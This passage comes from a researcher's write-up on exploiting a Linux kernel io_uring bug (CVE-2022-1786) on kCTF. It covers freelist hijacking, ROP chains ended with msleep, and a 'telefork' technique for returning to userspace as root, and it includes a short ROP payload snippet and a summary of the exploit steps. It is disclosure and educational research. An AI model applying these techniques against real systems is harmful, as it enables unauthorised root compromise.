Now, with the heap layout situation figured out, the exploit got a little further: it could leak all the information we wanted, but it crashed at the arbitrary write to binfmt.
This crash actually makes sense and is expected, because the arbitrary write corrupts the freelist. Let’s assume the freelist is initially A => NULL. After we hijack the list, it becomes A => binfmt => corrupted_pointer, and there is no way for us to avoid the corrupted pointer, because the freelist is encoded and we do not control the content of binfmt. So after the write on binfmt, if the kernel does one more allocation in kmalloc-256, it will panic.
I tried to make the exploit work by fixing the corrupted freelist. After the write on binfmt, the freelist has only corrupted_pointer left. We could free A again so it becomes A => corrupted_pointer, then hijack the freelist again and restore it back to A => NULL, and voila, no more corrupted freelist. This exploit worked fantastically locally but, yet again, not remotely.
After some more investigation, I concluded that this cache, kmalloc-256, is heavily used by many components of the kernel, so the freelist hijacking method just would not work on such a busy server.
The Dark Before The Dawn
After giving up on the freelist hijacking approach, I started playing with the idea of using timerfd_ctx to ROP.
I had already done a decent amount of work on this approach; I just needed to find a way to end the ROP chain gracefully (as discussed in the “Let’s ROP!” section).
Ofc, besides killing the task (do_task_dead) and returning back to userspace (D3v17’s approach that I failed to replicate), there is one more possibility to end a ROP chain: what if we just let it sleep indefinitely? Basically, ending the ROP chain with an msleep call (novel technique No.2). However, once the kernel reaches the msleep call (in interrupt context), it starts spamming warning messages in a busy loop. Initially, I thought the kernel was trapped in an infinite loop and didn’t investigate further.
But somehow, for reasons I no longer remember, I discovered that the kernel was actually fine calling msleep in an interrupt context: the messages flooding the console were just warnings, and nothing harmful was done. By using dmesg -n 1 to suppress the messages, I was able to debug again.
With this finding, my plan became:
- use the ROP chain to overwrite binfmt
- end the ROP chain “gracefully” with msleep
- in userspace, use the overwritten binfmt to ROP in task context and perform LPE
This version, again, worked locally, but not remotely. For some reason, I couldn’t return back to userspace from the ROP chain in binfmt: the kernel would crash when executing the KPTI trampoline [9]. Most weirdly, the crash only happened on kCTF; the exploit worked fine locally.
I tried to copy-paste payloads that had been proven to work (basically, all the public kCTF exploits back then). But no luck: all of them resulted in a kernel panic when trying to return back to userspace using the KPTI trampoline. I even attempted to replicate what Andy Nguyen did in CVE-2021-22555: instead of using the KPTI trampoline, I tried carefully not to clobber rbp in the ROP chain and then resumed execution on the original stack (instead of the heap). But still no: the kernel would panic.
At this point, it was already 5am, I knew I was too tired and decided to investigate further the next morning.
Day 7: The Dawn
The next morning, I was very tired and didn’t want to continue the journey.
So, I decided to burn one more novel technique on this exploit: I name it telefork (novel technique No.3).
Fun fact, I came up with this technique when developing the exploit for CVE-2022-29581 for kCTF 😀
Telefork: teleport back to userspace using fork
(The picture is generated using craiyon)
The issue is that we can’t return back to userspace easily (I suspect the msleep in interrupt context corrupts something in the current task). So I decided not to return to the original task context at all.
The idea of my approach, aka telefork, is simple: instead of trying to handle the CPU privilege ring stuff ourselves, we let the kernel do the work for us by simply calling fork and then msleep. The payload that I used is shown as follows:
```c
// return back to userspace
rop[idx++] = kaslr_slide + 0xffffffff8107ed20; // fork
rop[idx++] = kaslr_slide + 0xffffffff81076990; // pop rdi; ret
rop[idx++] = 0x1000000;
rop[idx++] = kaslr_slide + 0xffffffff81112710; // msleep
```
Basically, fork will extract the userspace return address of the current syscall and assign the value to the newly created task. (This is equivalent to how it works, but not exactly how it works; interested readers can look up ret_from_fork.)
After that, the old task will sleep forever because of the msleep call, and the newly created task will directly start executing from the extracted return address in userspace. Since we already finished privilege escalation before calling fork, the newly created task also has root privileges.
Although there is so much going on in kernel space, userspace does not observe any of it: it thinks it just returned from the execve call (with which we triggered the ROP payload in binfmt), now with root privileges. It’s like the execution teleports from kernel space back to userspace.
This time, the exploit worked remotely and helped me get the flag on kCTF’s platform.
Putting It Together
To summarize what I did in the final working exploit, the steps are:
- heap grooming to prepare a heap layout
- race with reading /etc/resolv.conf to trigger the vulnerability
- use a side-channel in the lower slot (msg_msgseg) to indicate whether the vulnerability got triggered or not
- leak KASLR and a heap address through the lower slot
- hijack a function pointer in timerfd_ctx (in the invalid slot) to ROP
- overwrite binfmt and then msleep to “gracefully” end the ROP in interrupt context
- use the overwritten binfmt to launch a ROP chain in task context and perform LPE
- successfully return back to userspace using telefork
Android
@chompie1337 pointed out that io_uring was accessible by unprivileged users [10] in Android back in 2021.
Knowing that this bug existed in Android as well, I bought a Pixel 6 immediately and tested it. Unsurprisingly, I crashed the freshly bought Pixel 6 using my PoC.
However, when I started preparing for the exploitation by upgrading the phone to the latest version, my PoC stopped working. After some further examination, I found out that the reason was that io_uring had been added to the seccomp list in Android. In other words, io_uring is no longer accessible by unprivileged users (e.g. normal apps) but is still accessible by privileged users (e.g. system apps or adb).
At this point, I stopped the journey because of my research work. (I’m sorry HJ, I should’ve worked on your project harder 🙁 )
Conclusion
I found and exploited CVE-2022-1786 on kCTF and won the first full bounty in kCTF’s history. I reported the bug to the Linux kernel security team and got the vulnerability patched.
I also discovered that the freelist hijacking attack may be unreliable (or even infeasible) if the target cache is too busy. Actually, I’m not 100% convinced by this conclusion myself; that’s why I said “may be”. If anyone finds a technique that makes freelist hijacking reliable on a busy cache, please let me know, I’d love to learn how to do it.
I will always remember the crazy 7 days that I spent on this exploit. That’s the wildest ride I have ever had with any exploitation.
And I’ll thank myself for keeping all the unfinished exploits untouched so I can recall and document what happened back then after half a year.
Finally, I’d like to thank @sirdarckat for being patient with me and resetting the servers manually for me for a few days, @chris_salls for being the best rubber duck in the world, @Markak_ for encouraging me to try out Android, and all my professors for not firing me (for not doing research work for a whole week straight).
Reference
[0] https://www.phoronix.com/news/Linux-5.6-IO-uring-Tests
[1] https://www.willsroot.io/2020/10/cuctf-2020-hotrod-kernel-writeup.html
[2] https://syst3mfailure.io/hotrod
[3] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
[4] https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
[5] https://kileak.github.io/ctf/2021/vulncon-ips/
[6] https://elixir.bootlin.com/linux/v5.10.90/source/fs/exec.c#L81
[7] https://elixir.bootlin.com/linux/v5.10.90/source/fs/binfmt_elf.c#L102
[8] https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html
[9] https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
[10] https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
[11] https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
[12] https://www.starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/
[13] https://www.usenix.org/conference/usenixsecurity22/presentation/zeng